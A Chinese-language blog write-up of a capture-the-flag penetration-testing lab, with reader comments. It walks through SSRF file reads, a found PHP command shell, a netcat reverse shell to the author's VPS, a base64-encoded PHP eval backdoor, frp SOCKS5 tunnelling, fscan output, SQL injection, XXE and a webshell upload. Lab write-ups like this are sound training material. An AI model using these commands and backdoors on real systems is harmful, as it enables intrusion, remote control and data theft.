前言:

 今天做完吃饭去了,容器就关了,第一次下午快下班的时候做了一遍,到后面内网穿透那里没配置好,然后下班回家了

今天把他做完顺便把思路整理一下

image-20221103123829808.png

flag数量为8,即总共有8个;其中直接靠外网能直接获得的有四个,内网在两台主机上也分别有两个共计八个;下面讲解不再考虑顺序,主要讲解思路。

思路:

拓扑图如下:

渗透测试3拓扑图解.jpg

首先开启容器得到靶机,访问地址:http://47.100.80.12:80
是一个“站长之家-模拟蜘蛛爬取”页面,能够看到一个输入框和一个提交框
直接尝试读取文件:file:///etc/passwd能读取到
尝试读取flag:file:///flag 得到flag1
读取hosts文件:file:///etc/hosts 看到本机IP 为192.168.0.2 【这里的话自己拓扑图画的有的问题,这个靶机应该也在这个网段里面的,但是我给画出去了,不过问题不大】
爆破这个网段,探测到http://192.168.0.10上有web服务,直接尝试http://192.168.0.10 提交访问到的是一个被葫芦娃小组黑了的站点
访问:http://192.168.0.10/shell.php
得到:

<?php
highlight_file(__FILE__); 
error_reporting(0);

system($_GET['cmd']);
?>

那么就可以直接执行命令了,ls发现当前目录存在flag 找到 flag2
ls /也发现一个 flag flag3
查看/usr/bin目录发现存在nc,直接反弹shell到自己的VPS上
访问:http://192.168.0.10/shell.php?cmd=nc xx.xx.xx.xx PORT -e /bin/sh
同时VPS监听端口,得到shell

然后可以通过wget下载工具,但是直接下载github项目里面的非常慢,VPS另启一个http-server服务

http-server.png

然后再shell里面下载工具

wget.png

用同样的方法下载frpc配置文件,这里同时加上SOCKS5代理
frpc.ini

[common]
server_addr = (your vps IP)
server_port = 7000

[lo80]
type = tcp
local_ip = 127.0.0.1
local_port = 80
remote_port = 16000

[socks5]
type = tcp 
remote_port = 16005
plugin = socks5

$chomod 777 frpc #加权限
$./frpc -c frpc.ini #运行frpc
同时VPS上运行:#./frps -c frps.ini (先运行这个)
然后就可以通过自己的VPS直接访问 http://192.168.0.10的80端口了
直接访问: VPS/shell.php?cmd=ps%20-ef 能访问
写个一句话木马进去 /?cmd=echo "PD9waHAgZXZhbCgkX1BPU1RbYml0XSk7Pz4="|base64 -d>bit.php
现在可以用蚁剑连接了 VPS/bit.php 密码:bit
上传fscan,开始扫描内网,有两个网段 192.168.0.0/24 还有一个10.10.0.0/24
分别扫描,待扫描完成查看结果:
res192.txt

192.168.0.1:22 open
192.168.0.10:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.250:80 open
192.168.0.138:80 open
192.168.0.2:9000 open
192.168.0.10:9000 open
192.168.0.250:9000 open
[+] FCGI:192.168.0.250:9000 
Status: 403 Forbidden
X-Powered-By: PHP/5.6.40
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)

plesa try other path,as -path /www/wwwroot/index.php
[+] FCGI:192.168.0.10:9000 
Status: 403 Forbidden
X-Powered-By: PHP/5.6.40
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)

plesa try other path,as -path /www/wwwroot/index.php
[+] FCGI:192.168.0.2:9000 
Status: 403 Forbidden
X-Powered-By: PHP/5.6.40
Content-type: text/html; charset=UTF-8

Access denied.
stderr:Access to the script '/etc/issue' has been denied (see security.limit_extensions)

plesa try other path,as -path /www/wwwroot/index.php
[*] WebTitle:http://192.168.0.10       code:200 len:770    title:葫芦娃小组
[*] WebTitle:http://192.168.0.250      code:200 len:2035   title:用户登录
[*] WebTitle:http://192.168.0.1        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle:http://192.168.0.2        code:200 len:1987   title:站长之家 - 模拟蜘蛛爬取
[*] WebTitle:http://192.168.0.138      code:200 len:953    title:Bugku分数查询系统

res10.txt

10.10.0.1:22 open
10.10.0.22:80 open
10.10.0.5:80 open
10.10.0.1:80 open
10.10.0.22:9000 open
10.10.0.5:9000 open

经过上面的FRP进行内网穿透后,挂上socks5代理,挂了socks 就可以通过那个中继连内部网段,因此可以直接访问内部的系统
浏览器使用代理工具挂上socks5代理并完成对应的配置,就可以直接访问了(具体配置如上图)
可以看到还有192.168.0.138有一个Bugku分数查询系统,存在SQL注入,一个简单的联合查询得到 flag4

还有192.168.0.250这台主机有一个用户登录

admin.jpg

直接输入admin admin,发现没啥变化,抓个包,
使用BURP配置socks5代理

burp-socks.jpg

抓包尝试发现有xxe漏洞

passwd.jpg

尝试读取flag
分别在根目录和/var/www/html/目录发现flag 得到 :flag5 flag6 实际好像这里是flag7 和flag8

flag5.jpg

flag6.jpg

然后访问10.10.0.22:80端口是一个 Slide4站点,访问 /admin.php 尝试弱口令登录 :admin admin 登录成功
在后台管理--》文件管理--》文件上传处有一个文件上传点,可以上传文件,直接上传一句话木马,发现能上传成功
然后进行利用,发现同上,分别在上级目录和根目录发现两个flag ,分别为flag7 flag8 实际上是flag5 flag6

flag7.jpg

至此所有flag已提交,我在拿到flag与最后提交的并不一致,因为提交完所有flag后容器会自动销毁,而我还有一个小时左右,反复开socks5代理也嫌麻烦,所以是到最后一起写在一起交的,故flag顺序可能有误,主要还是讲解思路及流程。

标签: none

  1. 栖迟 栖迟

    师傅请问是怎么把fscan上传并使用的啊,fscan安装不是要用到go嘛,但是权限不够无法添加到环境变量

    1. bit bit

      这个是用wget直接下载的

    2. bit bit

      不用那么麻烦,蚁剑连接后门可以直接上传文件,没权限chmod +x fscan 即可

  2. xd xd

    能不能复制一下你的xxe,payload,麻烦

  3. xd xd

    192.168.0.10,博主没有提权吗?

  4. xd xd

    要是有杀毒软件fscan和frp会不会被查杀?要是被查杀怎么免杀?

  5. xd xd

    能不能发一发,你的frps.ini怎么设置的?

    1. bit bit

      这个只需要在自己的VPS上添加指定端口即可

  6. xd xd

    除了burpsuite还有哪些工具能发送xxe payload?我的读取不了文件?

    1. bit bit

      XXExploiter应该也可以,至于没读取到的话,应该是姿势有问题,

  7. xd xd

    为什么我发送xxe的payload,读取不了文件?

  8. xd xd

    BURP配置socks5代理,还需要配置127.0.0.1:8080监听吗?

    1. bit bit

      添加SOCKS5代理即可,其他的不需要改动,还是需要burp正常抓取浏览器的包的

  9. xd xd

    怎么发现内网250,有xxe漏洞的?

  10. xd xd

    shell.php怎么爆破出来的啊?

    1. bit bit

      访问那个站点看到有被黑的,可以进行一些简单常见的文件名尝试访问

  11. xd xd

    博主,怎么爆破这个网段啊?192.168.0.10

    1. bit bit

      进入内网使用fscan进行扫描即可

      1. xd xd

        你是在外网的web发现的啊

  12. xd xd

    你怎么知道有文件读取这个漏洞?

  13. xd xd

    这个靶场你做几个小时?

  14. xd xd

    读取文件怎么发现的?扫描还是手工发现的?

  15. xd xd

    大佬有没有做春秋云境的仿真靶场

    1. bit bit

      最近没有做啥靶场了

  16. xd xd

    你觉得这个模式的靶场难度大吗?和真实场景有哪些不一样

    1. fanwuyu fanwuyu

      会不会是192.168.0.10那个机子ping命令没法用,导致fscan扫不出来?

    2. bit bit

      跟真实环境肯定还是有很大差别的,具体情况具体分析吧

  17. PandaGuoGuo PandaGuoGuo

    渗透测试2的教程大佬能出一个吗?

    1. bit bit

      最近比较忙,后面闲下来会考虑更新一下

      1. PandaGuoGuo PandaGuoGuo

        好嘞~期待ing

  18. 菜菜捞捞 菜菜捞捞

    大佬为什么我上传了fscan也给了权限,然后扫描结果永远都是0/0已完成,没有任何结果

    1. bit bit

      使用方法有问题?或者哪里配置有误吧

      1. xd xd

        我也是,你解决了吗?

        1. bit bit

          哪一个?

          1. xd xd

            192.168.0.10这台没有提权吗?,扫描显示没有权限

          2. xd xd

            fscan扫描提示,The current user permissions unable to send icmp packets

      2. 菜菜捞捞 菜菜捞捞

        我在我本地的机子试了一下功能完全正常,然后上传到上面扫,就不行

        1. xxtroy xxtroy

          我的fscan扫描和你的一样,The current user permissions unable to send icmp packets。请问你最后解决了吗?

        2. bit bit

          下载一个新的试试

          1. 菜菜捞捞 菜菜捞捞

            好的谢谢大佬我去试看看

          2. bit bit

            -np试试

          3. 菜菜捞捞 菜菜捞捞

            其中还有个提示就是我没有icmp权限

          4. 菜菜捞捞 菜菜捞捞

            大佬您用的是哪个版本的

已有 48 条评论